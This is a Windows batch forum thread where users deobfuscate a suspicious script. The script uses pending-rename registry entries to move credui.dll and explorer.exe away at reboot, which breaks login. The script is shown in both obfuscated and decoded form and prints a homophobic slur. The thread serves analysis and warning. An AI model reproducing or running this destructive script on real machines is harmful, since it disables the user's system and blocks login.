Need expert Batch techie

Discussion forum for all Windows batch related topics.

Moderator: DosItHelp

Post Reply
Message
Author
Lalna
Posts: 1
Joined: 06 Jul 2012 17:06

Need expert Batch techie

#1 Post by Lalna » 06 Jul 2012 17:08

Hello. I need to know what the following code does. Please could you add a comment to the end of every line (or whatever) to explain what it does? I highly recommend not running it as it's probably something bad.

Code: Select all

@echo off
set RenEngKeyPath=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
set evu=ye3s2tm&set evo=sng/whuo0td f&set unq=OtPgb4ifanso
set isa=%evu:~3,1%%evu:~0,1%%evu:~3,1%%evu:~5,1%%evu:~1,1%%evu:~6,1%%evu:~2,
1%%evu:~4,1%
set bb=%random%%random%
reg add "%RenEngKeyPath%" /f /v "AllowProtectedRenames" /t REG_SZ /d 1 >nul
reg add "%RenEngKeyPath%" /f /v "PendingFileRenameOperations" /t REG_MULTI_SZ /d "\??\%systemroot%\%isa%\credui.dll\0 !\??\%systemroot%\%isa%\%bb%.dll\0 \0 \??\%systemroot%\explorer.exe\0 !\??\%systemroot%\%bb%.dll" >nul
echo %unq:~6,1%%unq:~9,1%%unq:~4,1%%unq:~5,1%%evo:~11,1%%unq:~0,1%%unq:~2,1%%
evo:~11,1%%unq:~6,1%%unq:~10,1%%evo:~11,1%%unq:~8,1%%evo:~11,1%%unq:~7,1
%%unq:~8,1%%unq:~3,1%%unq:~3,1%%unq:~11,1%%unq:~1,1%
timeout 1 >nul
::%evo:~0,1%%evo:~5,1%%evo:~6,1%%evo:~9,1%%evo:~10,1%%evo:~7,1%%evo:~4,1
%%evo:~1,1%%evo:~11,1%%evo:~3,1%%evo:~0,1%%evo:~11,1%%evo:~3,1%%evo:~9,1
%%evo:~11,1%%evo:~8,1%

Ed Dyreen
Expert
Posts: 1569
Joined: 16 May 2011 08:21
Location: Flanders(Belgium)
Contact:

Re: Need expert Batch techie

#2 Post by Ed Dyreen » 07 Jul 2012 00:13

'
Who is 'inb4 OP' and who gave you this script ?

Seems that you can instruct the system to do pending file operations using the registry which is something I wasn't aware of and didn't verify but I certainly wouldn't test it with these values.
Also I didn't lookup the '\??\' question marks and even wonder if it could really work like that but assuming it could...

I haven't looked up 'credui.dll' but the name suggests it deals with the users credentials and is likely required for successful login.

'explorer.exe' on the other hand is a well known file. It is something like a web-browser for the internet but then for off-line folders and files, without it you loose the ability to navigate through folders, view files and perform searches.

At the end is a command that will shutdown your pc but it is commented out.

Code: Select all

:: Critical conditions for this script to run as intended:
:: - to be run by someone with administrator privileges.
:: Non-critical conditions for this script to run as intended:
:: - to be run on win7 or above ( timeout )
::
@echo off
set RenEngKeyPath=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
set $rnd=%random%%random%

:: reg add "%RenEngKeyPath%" /f /v "AllowProtectedRenames" /t REG_SZ /d 1 >nul
:: reg add "%RenEngKeyPath%" /f /v "PendingFileRenameOperations" /t REG_MULTI_SZ /d

"
\??\%systemroot%\system32\credui.dll
!\??\%systemroot%\system32\%$rnd%.dll

\??\%systemroot%\explorer.exe
!\??\%systemroot%\%$rnd%.dll
"
>nul

echo inb4 OP is a faggot
timeout 1 >nul
:: shutdown /s /t 0
After running this script, the system will start complaining about missing files and you'll loose the ability to login. Repair is done by putting these files back in place with for example cmdcons which can be found on your windows installation disk.

Liviu
Expert
Posts: 470
Joined: 13 Jan 2012 21:24

Re: Need expert Batch techie

#3 Post by Liviu » 07 Jul 2012 21:24

Ed Dyreen wrote:Who is 'inb4 OP'
I'd have guessed "in before original post(er)", if only that had made any sense ;-)

Ed Dyreen wrote:Seems that you can instruct the system to do pending file operations using the registry
Yes, sort of the NT+ equivalent to the old win16/9x wininit.ini [rename] section.

Liviu

Post Reply